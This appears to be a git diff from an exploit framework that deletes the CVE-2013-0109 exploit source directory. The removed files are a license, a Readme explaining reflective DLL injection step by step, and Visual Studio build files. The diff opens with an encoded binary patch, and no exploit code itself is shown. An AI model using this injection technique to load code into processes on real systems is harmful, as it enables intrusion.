zw2*%0WBgiYdivpGlW-^Do6hA-_cOixQl{&qzsBm#nMz?9({=X4`034=tlwt=Oh)fh
zFW3F2Eg)-Y=b6>ZBiVx#F3ajV`(^d+Ox7oPkL>)m5kM{F;!L(kv99YJ{G8Fhb7Yq9
zowQx0a+t1b>nbaYykPUvWtS~qarqT1e{$tdS6y}W&sJY^?R9Iezv0H4ZocK#mfLP$
zyY7zlcW$`r?t3=g`}6xY-T%OYtq=X;mz%dd{K(cvAN$p|U;pN}ZQCFJ-HzY?;fbA3
z?s{tXAD@0^&$G`xzxPisy!g_~`(9~(^|e2D{N?q(?tkNNe?Rc%TmLxt&$r(>^zM7_
zfAHZ)AAj=cXP<xZ<yT)bS^fHF5BQ&>1`Zm0^pInYJuc_?6Hd%M>Es{e4LxPp@KaA4
z!HyjD!_lXoac2IQAN_djxPtK<FWBr3r|5D^vZ88wp?7|b&!}Bc=f7ZKAQ%cqE{w+F
z^$m*}n=U%H`n>b!&g(h<;!7@FyyU+v|9`vvBi4V>gyNFYiDykJJ9~2Zl&RA^(<>^g
z@KZdqX3w$o-*f)|3H{?nbmD&VOn=B1UQ`+P#{IbGg!CCPBRXyV1x8K0EL0ng2F;9_
z7&FK#_r~HyHF1A~;R#3TBW9Wvx5zM4a0lDFz?cwjoXO0<y&Aeho_TMa#@~^ef6wae
zmH9KpxHmNwn1S#2qrp#gbwPE+A2F&!4KcdOICv0=6%Mhd*R$bTd`j?|<JjV9Q>T^|
zR}E%Hj$~(qyz>JF8xONJQNtTI*pN49_*kOC<|lMj8jXgd`D0j>=$y+np5A!g7<17F
zS|w$bo#af~<z=N)t5{WID@!ZRDXlQep&gS3yC~|9`$G$;IckA22MwBu#JFKHnNP&W
zur+nwsJA9=L}Ohg2ca>GBoQw*o1yxhw86fQXxB!=!36)_I2$m~*<;yInDu$%UKYBb
zhQa=zK^3S#5_NC1lLQ)=Q11_zbdAPHAncE`1qB5b-=>gpZ_PrsCLCVqH(2hBMv1aO
zoAN>p4Y7ur0;ADj=X+x*+1On;f}@SeIdmWHq=H06Wl3f1{kNrEbMwo$EL!yVG^N8%
z6GO37eRg<$th&Oe4PXSo&`Zk8%R)37U=2tntr*qO&g{9qK%gMvo1b6{f5!=9Vi-IE
zeAojIYS32+2G5(AVKP2_1SUxw$vA$MBt4%^&rhxY&`A6fB=Al3Ln0o*NzlAB<vOz+
z&fQf`Nx5#z;Ag9r-rk;!{Htl1kRs3SjQqT_t$Zr8zpSgxRJkbc*2(E~GV_m}mY$#4
zPDe$0erA2&IqCVS`uN9r;0qu=lDbRH|9UQLX<mAMrk)OZ)AKXiUxz)=RQj3u3m2s4
zXX;rAe{=pxk@Wmb{k+(eo}Wp7`||YsO#X(g#B;(Ak_6TfYDKs@8A}iQ_QEZFtYnJK
z31gx^U=%T@4<IjYP=xtKc4ff8u2Wlo@~~zS)30CZTteUaiv!`9G07Y9p~ldx)UD&m
zr4>_4%WXmdoD#$QJ_|LA>!VR46tAiyCtv1cm|e7&7WQER_lGb~FqfO9!oeU2mit5C
zs4ct7hz9*3%xRr_(rqcUl8Mh}&j{6-Z1_qWYp?+a4+)-$D05dfw!M4K?q3!wG3M7V
zSYSjwQ6mNhnYWoz;-{GAxf*Yv((<@?qN;zn;cYOwrN4#psdD^2yDAV%?5RIN*AU*?
zci%~|&RzIFP|Vz$f2Us=wTNB#g@&&zgjqaDj4*km@hM?neITJ_EPi4n53PR8*%+^Y
zq}GK(lXXj}E-9$U=YwF_<9w#yB*Pmq8)U*n#p=1@a6Pr<qw<w;U!psizk)6l;0^dM
z$`rXM<g1MMLsrH2sXxd-s+uCW|7ub3M&tDnTC~k%o<%PQjCdvu=EN@9sP<GWS&A6O
zn??MUh8q0QaEO#p8INK?5Sz&yKVYWcXB1;qQ5Bw2ABg)WG{p^OAGLnC;>;gSX)XI^
zn5WHHi4luO!%fUR{ioL((I$@(HJ6p48pD(Y=5ifzRpqZ)n9$1h?$!p=Z8D{7ieaO-
z$`8I{ru?{KqGovyiH;w@2d$!F55tI5ep=}ix*iORgEjbl#bo+ep)z^d74g7~&>}2<
znWs!XE#rC4ysj{;nBKoU?8Ug4AH_y7>>#(h{*Zc$*?u?_3kM8pZBt4dhJ@YcnOPG9
z^|3nQctU+`E!JoFiR}L6#Z$ZyOV^;Xpns=^tHMdOGk#NQvp=Y>QLdJ(h$tn8Fp~}G
z5~DI4oruL~eH2628drNwc`9K~3^UsDHN_UEGnp%hQi}EcEX6aSp~P`p;`y8RHe=n6
zv?LB7eh@fBz>U`dTc|?D(uh3K+^*FWY14=natYGk`+)wB>Y<^(E$P5-?UAq)T6Z84
zqMNDdYM^`Kq~o3r$|v+4eH!Sk1{(3qYaKv#h2Op~?T2iLz6()E&ymqy3LY!LPLKKA
zocUZAo`^G_>!SUcApq^qP)J|aD36{+OXd+>s!QQ<0MRA$rZn2Wp}iXdrH=$C-I0hF
zCE~@2xCbHCsYs+(CPMN`M1M9wZPW8SL?;NaKm?#YA1pykUh({&S-u$|@w_w<E<;GN
zTm}%m<p9yS1{ed}o`~OpkoesIP<!_PRPGUg_<I_l{1*Yr&x2A(KLpYXzV>t;&E_{;
zB!0&uD^V{QCdnk@$*`yNp7Q_Q@<}?$Fj@cm8|L(QSTeIc9^Vh0^n5eflCS5xao-R5
zNs1m#ATfjYXael_M+cDP|G6p9zY}Hk%O1D^6W_dLP0L0mI_K^`TNiiSWra)EcF@*8
zQ@FU<3^$_u_B;38$y(XnK9_!FB^4&ZExjyXlqml&%0IJy|N2vyH`X6me{Rq87vEvl
zn2w2h`o8n`vCQ0k7wi+dmw*1H*E&9B7=E$E8Qs4sMkxi)Ft`9azyV`{d|)&%9LNQR
z01WWK^>`;9=m6S*mw>&%9$+`H6W9T?0o#DBz-FKo*a)-$Yk*Y%m0u2A0>ptjU>;Bf
zOae-PLck8NKrS!{i<0CVGX(K$;EOfj3pfbu2ik$%z&2nLa1*c`hy(M0S%3$a1QY@;
zfCKUY7RUo~fPnx59J&rPfjz(ufXZ)0xCv+hRsxNH5AXn!fI?s_kPRHd&xliJB>C>v
zF-Mp{|6!F%;z;AfXC|-oyFAG@R^I^~-3`6ogLm%HHvQkxkMPb$Z$LEYxfTKgnk?S&
z{x&R09N8#88s&Qe@kqQ~duJD~)C@b|I(ihS^Psg^>ahmpX)KV;#8;;5o}$_1(~3%@
z)H;3FeH!S~K%WNsG|;DkJ`MC~;Javm?yu2mgYK~b%@m^}nNI5z?l9@J2Bv2oX0`QW
z=3ue1->SeU-dGIpy9Juq#$X^6Q%BWDLsG1!&Io#A<AVO0XgC(GjgPAd2PJPTSkS<a
zVzI&Juf<l(IoN!_PMtc6FW^RL#|&m!B_72KbF_QXOKLW&9%{ynntJTmHJNniE3gtZ
zF2s9oal_|{`WvuGvA~FRW~OGBHliwR8I~IjMgUKn;8Pvtjg^HO!V8V)D7M~TR6{Ss
zs-tSXftWE$Q^t4FPOscaKcz&s)|K&Tyei{6g+_H{d{Up9r^r)OQc^bctXZ=X7e^AO
z)oBa*ZzwmJi*h$|4{^WZ+PGcZGu&S8W$ra@Kle|rA3uaYnHTtCzJjmjYx!mTb^QJO
zQ~Z;{Gs0fsbzz8Yyv=T#V>4_&wcT#pWP8DO!1kpr*M5ebvpemoeWty|exH4j^K$16
zuDe|M(sU^-EtXbEtEDy4O;U^Wi1d{7lGLiTX@(xrFV(l`kLf$~PjrUGJLKRkhs)ze
za&x$=xi#D^+=JX-xG%Yr_&WZ2zP~U?I8Hc87$%Gq@`dq&Q&5ExVX{ym%n{}b7YGf)
z5@ES;rLac0P1q=G79JIz6rKjp`-DTn$HG@aw(T_AIGbdfXgkMto-JT&w5_n+Yx|Y$
zN!x3X;aGc--D96^ztq0T{<fWQY;tUNJn7i$xZXKVoGe}_J}Y*JpNnO(TUo9?p}w!?
zY9Ht{NIVz^CkaD^Q^D2g!Wdzkzzdq-5jeDT7Ft+kyV<tZ)^7X6Hq2gN_u3cRpR*I~
z-HyLIG-suAj<ePoa5g#@JFjqF<-EbU-nr4)>U`MwxO1oTPtHF(-*CR;JYGCQEEiXa
z*NWT3$HkrEYvM=ZaMum4M_s>jeeUY-p5~tGHryAw7rC!+U**2ez24pGe$3tGe!=~U
z`>*ad-G|&CxxaMxmyVWBkbWSIkn$zF<d!t4M4BW`l`5s#()m(Qx=i|sbd7X_bh~t?
zbf46Up85m&>RD-@^qIuSd2+E_CZ8*>kgt|+k)M_K$$yhaDEW$A@hImgbCp_UrShdR
zK+RKssOGDZTB4Szh8k8^sH@eVt6S7xtAA9VSNE%@YG-Owv??v6)obgt5qhaUS+9o;
zY}a4VnL_;L0Bqn??o6(NyMSBCZQ|Owx4GfG&X@9Y_>1_p{LlGE`FHuxc||x&n2vrA
z3ghgWeWJbGJ{`9AJNuLNH|)naW;+Z=+|lH?#j)1$gyVTfyW@4o0f$#yE?y(vCf+69
zFFq>1F1{sxD1If5aOJzExvE`WSJ-v7JLqn7-|BwL%}Xw6f>b3fl$xX^(t7D$>2c`=
zsa<+Q`a~KoSIe#P9{E#wxUxlgPZ^{(X;*4Hv}d(fv^TZ)v@bMHmm%5tdYyi;zLq4T
zm&ch^2#)4XgKgi(eZbXVY<&!?J{i_r3_Grb4PPd#h3!5dJR)opo)X>@hS|p23SmR9
z*nVhVWS1Oujt<9Xj-#C=&bWB7*bW&Eh}XM+>CQpFTqCzAb!t#uqTZ%Hq&}h+Xy<7)
zT2y;S`%wE@3+gd_iT<$uwEnuz%)>wJf|sG(2yQeda3ZI0Mcj0*nY$dk{fXPh<?=&$
zmOq^z%k$9vI{se%L0%Ll3NxVbI^imeu@-oO<87zd#@Nbj(=nogwq3SYZSUBe_Nn$+
z_L%)*`%?SQ&>wryA16C(jwO!!9RtM6#W%#2u8ppn+}qu!NGs*}ilEl0P3mLn%W8wR
zQQM=Pt;h8>`YwGh=`4cxT@aLU*K$8bpVtdF3A}B%SRfXP6{1hPQfv_)5ZlD(#Qhi%
z16`-M#=10@$2H&eFh)kZ>ob?reZKpE`(5cHX^4EGe5w4Qe4LV}oUizlOO;*97fP-=
z%(U0BDyPmiHMc?CsBThQ)y?Wwb(`9z4%TwCTrE!<t}WB90*4Q3o3*XlHtkjIDBZ0W
z>LvOly<GR`Rr)NwTEAQ0q_^su^{qP1s+WNG!Q42`#cAABu9EX{0r=fZxMkcbNYujJ
z#kF!<xZiL)x#ziK`Fwr?Ut*gKZC-}I$lPUn-F7tmsbL@BIKja?UUr=2e89Qg`Lgp<
zXSs;qUls2aUl9Adj&&)nvt3ua*SK$Xuf@2(Tt=g->3wHBAHe7F!_kjpd5)jQ`}ooN
zSlzBG;JF<9R_i`J0Bv8QFV|N==PmjMaKBmK27kO;XVzIXR>`a7d}R_eR)-P3Mrl>H
zDK9CXD0%8=wNRa>HmmDQJ+-SHDx<Mlp*Bxz#>j5dIy9yYJitE=<Z`%`!YX04J2?xi
zlQu{jrA_cMo29MNHmOb8A?=iQOM9ffm>t@s4r#x1KsqQLl0LwA`vU$aTgLyM$vJW^
zJkfBOl}F3@@>rRZ?XpXrB$vw`xk{deaXC-+$#rr-j>vJjQNBcOmY2&bWs+ize3RTF
zuah^(8|6(HznkT)@;13m-XZUlcVjf~m0yzE<qmnjd_X=ZACf)FJSCzuE31{wN}IAn
z*{SSS_9%NHeY?`3>{kvb2bDw02hhbpb%>gy=EC<4S6S#KUmdHuR0aAeQ75V8sz<F-
eXQ|cD)@l{q(s%S}picvR8tBtNp9cP;8u%A;$$3Wr

diff --git a/external/source/exploits/cve-2013-0109/LICENSE.txt b/external/source/exploits/cve-2013-0109/LICENSE.txt
deleted file mode 100644
index f217025f51..0000000000
--- a/external/source/exploits/cve-2013-0109/LICENSE.txt
+++ /dev/null
@@ -1,25 +0,0 @@
-Copyright (c) 2011, Stephen Fewer of Harmony Security (www.harmonysecurity.com)
-All rights reserved.
-
-Redistribution and use in source and binary forms, with or without modification, are permitted 
-provided that the following conditions are met:
-
-    * Redistributions of source code must retain the above copyright notice, this list of 
-conditions and the following disclaimer.
-
-    * Redistributions in binary form must reproduce the above copyright notice, this list of 
-conditions and the following disclaimer in the documentation and/or other materials provided 
-with the distribution.
-
-    * Neither the name of Harmony Security nor the names of its contributors may be used to
-endorse or promote products derived from this software without specific prior written permission.
-
-THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR 
-IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND
-FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR 
-CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR 
-CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR 
-SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY 
-THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR 
-OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE 
-POSSIBILITY OF SUCH DAMAGE.
\ No newline at end of file
diff --git a/external/source/exploits/cve-2013-0109/Readme.md b/external/source/exploits/cve-2013-0109/Readme.md
deleted file mode 100644
index 814e6e7517..0000000000
--- a/external/source/exploits/cve-2013-0109/Readme.md
+++ /dev/null
@@ -1,40 +0,0 @@
-About
-=====
-
-Reflective DLL injection is a library injection technique in which the concept of reflective programming is employed to perform the loading of a library from memory into a host process. As such the library is responsible for loading itself by implementing a minimal Portable Executable (PE) file loader. It can then govern, with minimal interaction with the host system and process, how it will load and interact with the host.
-
-Injection works from Windows NT4 up to and including Windows 8, running on x86, x64 and ARM where applicable.
-
-Overview
-========
-
-The process of remotely injecting a library into a process is two fold. Firstly, the library you wish to inject must be written into the address space of the target process (Herein referred to as the host process). Secondly the library must be loaded into that host process in such a way that the library's run time expectations are met, such as resolving its imports or relocating it to a suitable location in memory.
-
-Assuming we have code execution in the host process and the library we wish to inject has been written into an arbitrary location of memory in the host process, Reflective DLL Injection works as follows.
-
-* Execution is passed, either via CreateRemoteThread() or a tiny bootstrap shellcode, to the library's ReflectiveLoader function which is an exported function found in the library's export table.
-* As the library's image will currently exists in an arbitrary location in memory the ReflectiveLoader will first calculate its own image's current location in memory so as to be able to parse its own headers for use later on.
-* The ReflectiveLoader will then parse the host processes kernel32.dll export table in order to calculate the addresses of three functions required by the loader, namely LoadLibraryA, GetProcAddress and VirtualAlloc.
-* The ReflectiveLoader will now allocate a continuous region of memory into which it will proceed to load its own image. The location is not important as the loader will correctly relocate the image later on.
-* The library's headers and sections are loaded into their new locations in memory.
-* The ReflectiveLoader will then process the newly loaded copy of its image's import table, loading any additional library's and resolving their respective imported function addresses.
-* The ReflectiveLoader will then process the newly loaded copy of its image's relocation table.
-* The ReflectiveLoader will then call its newly loaded image's entry point function, DllMain with DLL_PROCESS_ATTACH. The library has now been successfully loaded into memory.
-* Finally the ReflectiveLoader will return execution to the initial bootstrap shellcode which called it, or if it was called via CreateRemoteThread, the thread will terminate.
-
-Build
-=====
-
-Open the 'rdi.sln' file in Visual Studio C++ and build the solution in Release mode to make inject.exe and reflective_dll.dll
-
-Usage
-=====
-
-To test use the inject.exe to inject reflective_dll.dll into a host process via a process id, e.g.:
-
-> inject.exe 1234
-	
-License
-=======
-
-Licensed under a 3 clause BSD license, please see LICENSE.txt for details.
diff --git a/external/source/exploits/cve-2013-0109/dll/reflective_dll.sln b/external/source/exploits/cve-2013-0109/dll/reflective_dll.sln
deleted file mode 100644
index eff992d77c..0000000000
--- a/external/source/exploits/cve-2013-0109/dll/reflective_dll.sln
+++ /dev/null
@@ -1,20 +0,0 @@
-
-Microsoft Visual Studio Solution File, Format Version 10.00
-# Visual C++ Express 2008
-Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "reflective_dll", "reflective_dll.vcproj", "{3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}"
-EndProject
-Global
-	GlobalSection(SolutionConfigurationPlatforms) = preSolution
-		Debug|Win32 = Debug|Win32
-		Release|Win32 = Release|Win32
-	EndGlobalSection
-	GlobalSection(ProjectConfigurationPlatforms) = postSolution
-		{3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Debug|Win32.ActiveCfg = Release|Win32
-		{3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Debug|Win32.Build.0 = Release|Win32
-		{3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Release|Win32.ActiveCfg = Release|Win32
-		{3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}.Release|Win32.Build.0 = Release|Win32
-	EndGlobalSection
-	GlobalSection(SolutionProperties) = preSolution
-		HideSolutionNode = FALSE
-	EndGlobalSection
-EndGlobal
diff --git a/external/source/exploits/cve-2013-0109/dll/reflective_dll.vcproj b/external/source/exploits/cve-2013-0109/dll/reflective_dll.vcproj
deleted file mode 100644
index 33c6bd9515..0000000000
--- a/external/source/exploits/cve-2013-0109/dll/reflective_dll.vcproj
+++ /dev/null
@@ -1,357 +0,0 @@
-<?xml version="1.0" encoding="Windows-1252"?>
-<VisualStudioProject
-	ProjectType="Visual C++"
-	Version="9.00"
-	Name="reflective_dll"
-	ProjectGUID="{3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}"
-	RootNamespace="reflective_dll"
-	Keyword="Win32Proj"
-	TargetFrameworkVersion="196613"
-	>
-	<Platforms>
-		<Platform
-			Name="Win32"
-		/>
-		<Platform
-			Name="x64"
-		/>
-	</Platforms>
-	<ToolFiles>
-	</ToolFiles>
-	<Configurations>
-		<Configuration
-			Name="Debug|Win32"
-			OutputDirectory="$(SolutionDir)$(ConfigurationName)"
-			IntermediateDirectory="$(ConfigurationName)"
-			ConfigurationType="2"
-			CharacterSet="1"
-			>
-			<Tool
-				Name="VCPreBuildEventTool"
-			/>
-			<Tool
-				Name="VCCustomBuildTool"
-			/>
-			<Tool
-				Name="VCXMLDataGeneratorTool"
-			/>
-			<Tool
-				Name="VCWebServiceProxyGeneratorTool"
-			/>
-			<Tool
-				Name="VCMIDLTool"
-			/>
-			<Tool
-				Name="VCCLCompilerTool"
-				Optimization="0"
-				PreprocessorDefinitions="WIN32;_DEBUG;_WINDOWS;_USRDLL;REFLECTIVE_DLL_EXPORTS"
-				MinimalRebuild="true"
-				BasicRuntimeChecks="3"
-				RuntimeLibrary="3"
-				UsePrecompiledHeader="0"
-				WarningLevel="3"
-				DebugInformationFormat="4"
-			/>
-			<Tool
-				Name="VCManagedResourceCompilerTool"
-			/>
-			<Tool
-				Name="VCResourceCompilerTool"
-			/>
-			<Tool
-				Name="VCPreLinkEventTool"
-			/>
-			<Tool
-				Name="VCLinkerTool"
-				LinkIncremental="2"
-				GenerateDebugInformation="true"
-				SubSystem="2"
-				TargetMachine="1"
-			/>
-			<Tool
-				Name="VCALinkTool"
-			/>
-			<Tool
-				Name="VCManifestTool"
-			/>
-			<Tool
-				Name="VCXDCMakeTool"
-			/>
-			<Tool
-				Name="VCBscMakeTool"
-			/>
-			<Tool
-				Name="VCFxCopTool"
-			/>
-			<Tool
-				Name="VCAppVerifierTool"
-			/>
-			<Tool
-				Name="VCPostBuildEventTool"
-			/>
-		</Configuration>
-		<Configuration
-			Name="Debug|x64"
-			OutputDirectory="$(SolutionDir)$(PlatformName)\$(ConfigurationName)"
-			IntermediateDirectory="$(PlatformName)\$(ConfigurationName)"
-			ConfigurationType="2"
-			CharacterSet="1"
-			>
-			<Tool
-				Name="VCPreBuildEventTool"
-			/>
-			<Tool
-				Name="VCCustomBuildTool"
-			/>
-			<Tool
-				Name="VCXMLDataGeneratorTool"
-			/>
-			<Tool
-				Name="VCWebServiceProxyGeneratorTool"
-			/>
-			<Tool
-				Name="VCMIDLTool"
-				TargetEnvironment="3"
-			/>
-			<Tool
-				Name="VCCLCompilerTool"
-				Optimization="0"
-				PreprocessorDefinitions="WIN32;_DEBUG;_WINDOWS;_USRDLL;REFLECTIVE_DLL_EXPORTS"
-				MinimalRebuild="true"
-				BasicRuntimeChecks="3"
-				RuntimeLibrary="3"
-				UsePrecompiledHeader="0"
-				WarningLevel="3"
-				DebugInformationFormat="3"
-			/>
-			<Tool
-				Name="VCManagedResourceCompilerTool"
-			/>
-			<Tool
-				Name="VCResourceCompilerTool"
-			/>
-			<Tool
-				Name="VCPreLinkEventTool"
-			/>
-			<Tool
-				Name="VCLinkerTool"
-				LinkIncremental="2"
-				GenerateDebugInformation="true"
-				SubSystem="2"
-				TargetMachine="17"
-			/>
-			<Tool
-				Name="VCALinkTool"
-			/>
-			<Tool
-				Name="VCManifestTool"
-			/>
-			<Tool
-				Name="VCXDCMakeTool"
-			/>
-			<Tool
-				Name="VCBscMakeTool"
-			/>
-			<Tool
-				Name="VCFxCopTool"
-			/>
-			<Tool
-				Name="VCAppVerifierTool"
-			/>
-			<Tool
-				Name="VCPostBuildEventTool"
-			/>
-		</Configuration>
-		<Configuration
-			Name="Release|Win32"
-			OutputDirectory="$(SolutionDir)$(ConfigurationName)"
-			IntermediateDirectory="$(ConfigurationName)"
-			ConfigurationType="2"
-			CharacterSet="2"
-			WholeProgramOptimization="1"
-			>
-			<Tool
-				Name="VCPreBuildEventTool"
-			/>
-			<Tool
-				Name="VCCustomBuildTool"
-			/>
-			<Tool
-				Name="VCXMLDataGeneratorTool"
-			/>
-			<Tool
-				Name="VCWebServiceProxyGeneratorTool"
-			/>
-			<Tool
-				Name="VCMIDLTool"
-			/>
-			<Tool
-				Name="VCCLCompilerTool"
-				Optimization="2"
-				InlineFunctionExpansion="1"
-				EnableIntrinsicFunctions="true"
-				PreprocessorDefinitions="WIN32;NDEBUG;_WINDOWS;_USRDLL;REFLECTIVE_DLL_EXPORTS;REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR;REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN"
-				RuntimeLibrary="0"
-				EnableFunctionLevelLinking="true"
-				UsePrecompiledHeader="0"
-				WarningLevel="3"
-				DebugInformationFormat="3"
-			/>
-			<Tool
-				Name="VCManagedResourceCompilerTool"
-			/>
-			<Tool
-				Name="VCResourceCompilerTool"
-			/>
-			<Tool
-				Name="VCPreLinkEventTool"
-			/>
-			<Tool
-				Name="VCLinkerTool"
-				LinkIncremental="1"
-				GenerateDebugInformation="true"
-				SubSystem="2"
-				OptimizeReferences="2"
-				EnableCOMDATFolding="2"
-				TargetMachine="1"
-			/>
-			<Tool
-				Name="VCALinkTool"
-			/>
-			<Tool
-				Name="VCManifestTool"
-			/>
-			<Tool
-				Name="VCXDCMakeTool"
-			/>
-			<Tool
-				Name="VCBscMakeTool"
-			/>
-			<Tool
-				Name="VCFxCopTool"
-			/>
-			<Tool
-				Name="VCAppVerifierTool"
-			/>
-			<Tool
-				Name="VCPostBuildEventTool"
-				CommandLine="copy ..\Release\reflective_dll.dll ..\bin\"
-			/>
-		</Configuration>
-		<Configuration
-			Name="Release|x64"
-			OutputDirectory="$(SolutionDir)$(PlatformName)\$(ConfigurationName)"
-			IntermediateDirectory="$(PlatformName)\$(ConfigurationName)"
-			ConfigurationType="2"
-			CharacterSet="2"
-			WholeProgramOptimization="0"
-			>
-			<Tool
-				Name="VCPreBuildEventTool"
-			/>
-			<Tool
-				Name="VCCustomBuildTool"
-			/>
-			<Tool
-				Name="VCXMLDataGeneratorTool"
-			/>
-			<Tool
-				Name="VCWebServiceProxyGeneratorTool"
-			/>
-			<Tool
-				Name="VCMIDLTool"
-				TargetEnvironment="3"
-			/>
-			<Tool
-				Name="VCCLCompilerTool"
-				Optimization="2"
-				InlineFunctionExpansion="1"
-				EnableIntrinsicFunctions="true"
-				FavorSizeOrSpeed="2"
-				WholeProgramOptimization="false"
-				PreprocessorDefinitions="WIN64;NDEBUG;_WINDOWS;_USRDLL;REFLECTIVE_DLL_EXPORTS;_WIN64;REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR;REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN"
-				RuntimeLibrary="0"
-				EnableFunctionLevelLinking="true"
-				UsePrecompiledHeader="0"
-				WarningLevel="3"
-				DebugInformationFormat="3"
-				CompileAs="2"
-			/>
-			<Tool
-				Name="VCManagedResourceCompilerTool"
-			/>
-			<Tool
-				Name="VCResourceCompilerTool"
-			/>
-			<Tool
-				Name="VCPreLinkEventTool"
-			/>
-			<Tool
-				Name="VCLinkerTool"
-				OutputFile="$(OutDir)\$(ProjectName).x64.dll"
-				LinkIncremental="1"
-				GenerateDebugInformation="true"
-				SubSystem="2"
-				OptimizeReferences="2"
-				EnableCOMDATFolding="2"
-				TargetMachine="17"
-			/>
-			<Tool
-				Name="VCALinkTool"
-			/>
-			<Tool
-				Name="VCManifestTool"
-			/>
-			<Tool
-				Name="VCXDCMakeTool"
-			/>
-			<Tool
-				Name="VCBscMakeTool"
-			/>
-			<Tool
-				Name="VCFxCopTool"
-			/>
-			<Tool
-				Name="VCAppVerifierTool"
-			/>
-			<Tool
-				Name="VCPostBuildEventTool"
-				CommandLine="copy $(OutDir)\$(ProjectName).x64.dll ..\bin\"
-			/>
-		</Configuration>
-	</Configurations>
-	<References>
-	</References>
-	<Files>
-		<Filter
-			Name="Source Files"
-			Filter="cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx"
-			UniqueIdentifier="{4FC737F1-C7A5-4376-A066-2A32D752A2FF}"
-			>
-			<File
-				RelativePath=".\src\ReflectiveDll.c"
-				>
-			</File>
-			<File
-				RelativePath=".\src\ReflectiveLoader.c"
-				>
-			</File>
-		</Filter>
-		<Filter
-			Name="Header Files"
-			Filter="h;hpp;hxx;hm;inl;inc;xsd"
-			UniqueIdentifier="{93995380-89BD-4b04-88EB-625FBE52EBFB}"
-			>
-			<File
-				RelativePath=".\src\ReflectiveDLLInjection.h"
-				>
-			</File>
-			<File
-				RelativePath=".\src\ReflectiveLoader.h"
-				>
-			</File>
-		</Filter>
-	</Files>
-	<Globals>
-	</Globals>
-</VisualStudioProject>
diff --git a/external/source/exploits/cve-2013-0109/dll/reflective_dll.vcxproj b/external/source/exploits/cve-2013-0109/dll/reflective_dll.vcxproj
deleted file mode 100644
index b233a13c97..0000000000
--- a/external/source/exploits/cve-2013-0109/dll/reflective_dll.vcxproj
+++ /dev/null
@@ -1,266 +0,0 @@
-<?xml version="1.0" encoding="utf-8"?>
-<Project DefaultTargets="Build" ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
-  <ItemGroup Label="ProjectConfigurations">
-    <ProjectConfiguration Include="Debug|ARM">
-      <Configuration>Debug</Configuration>
-      <Platform>ARM</Platform>
-    </ProjectConfiguration>
-    <ProjectConfiguration Include="Debug|Win32">
-      <Configuration>Debug</Configuration>
-      <Platform>Win32</Platform>
-    </ProjectConfiguration>
-    <ProjectConfiguration Include="Debug|x64">
-      <Configuration>Debug</Configuration>
-      <Platform>x64</Platform>
-    </ProjectConfiguration>
-    <ProjectConfiguration Include="Release|ARM">
-      <Configuration>Release</Configuration>
-      <Platform>ARM</Platform>
-    </ProjectConfiguration>
-    <ProjectConfiguration Include="Release|Win32">
-      <Configuration>Release</Configuration>
-      <Platform>Win32</Platform>
-    </ProjectConfiguration>
-    <ProjectConfiguration Include="Release|x64">
-      <Configuration>Release</Configuration>
-      <Platform>x64</Platform>
-    </ProjectConfiguration>
-  </ItemGroup>
-  <PropertyGroup Label="Globals">
-    <ProjectGuid>{3A371EBD-EEE1-4B2A-88B9-93E7BABE0949}</ProjectGuid>
-    <RootNamespace>reflective_dll</RootNamespace>
-    <Keyword>Win32Proj</Keyword>
-  </PropertyGroup>
-  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
-    <ConfigurationType>DynamicLibrary</ConfigurationType>
-    <PlatformToolset>v100</PlatformToolset>
-    <CharacterSet>MultiByte</CharacterSet>
-    <WholeProgramOptimization>true</WholeProgramOptimization>
-  </PropertyGroup>
-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|ARM'" Label="Configuration">
-    <ConfigurationType>DynamicLibrary</ConfigurationType>
-    <PlatformToolset>v110</PlatformToolset>
-    <CharacterSet>MultiByte</CharacterSet>
-    <WholeProgramOptimization>true</WholeProgramOptimization>
-  </PropertyGroup>
-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
-    <ConfigurationType>DynamicLibrary</ConfigurationType>
-    <PlatformToolset>v110</PlatformToolset>
-    <CharacterSet>Unicode</CharacterSet>
-  </PropertyGroup>
-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|ARM'" Label="Configuration">
-    <ConfigurationType>DynamicLibrary</ConfigurationType>
-    <PlatformToolset>v110</PlatformToolset>
-    <CharacterSet>Unicode</CharacterSet>
-  </PropertyGroup>
-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
-    <ConfigurationType>DynamicLibrary</ConfigurationType>
-    <PlatformToolset>v110</PlatformToolset>
-    <CharacterSet>MultiByte</CharacterSet>
-    <WholeProgramOptimization>false</WholeProgramOptimization>
-  </PropertyGroup>
-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
-    <ConfigurationType>DynamicLibrary</ConfigurationType>
-    <PlatformToolset>v110</PlatformToolset>
